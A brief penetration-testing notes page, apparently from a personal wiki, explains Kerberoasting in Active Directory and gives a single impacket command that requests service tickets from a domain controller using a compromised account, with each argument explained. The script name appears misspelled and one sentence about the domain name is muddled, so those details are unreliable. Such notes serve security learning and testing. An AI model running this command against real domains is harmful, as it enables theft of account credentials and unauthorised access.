Kerberoasting

Kerberoasting takes advantage of the way the Kerberos protocol works in Active Directory environments. Read up on it here, here, and here.

Any authenticated member of a domain can take advantage of this attack. To perform the attack, we use the impacket script GetUsersSPNs.py. You can find this on the default Kali by searching in the /usr/doc/python3-impacket/examples/ folder.

python3 GetUsersSPNs.py -request -dc-ip 10.0.0.1 acme.corp/victim_user

  • 10.0.0.1 = The IP of the domain controller

  • acme.corp = The domain (you will run into issues on this step, it is local for the formal name of the domain, so I can’t just use ACME for example)

  • victim_user = The user I compromised.

Last updated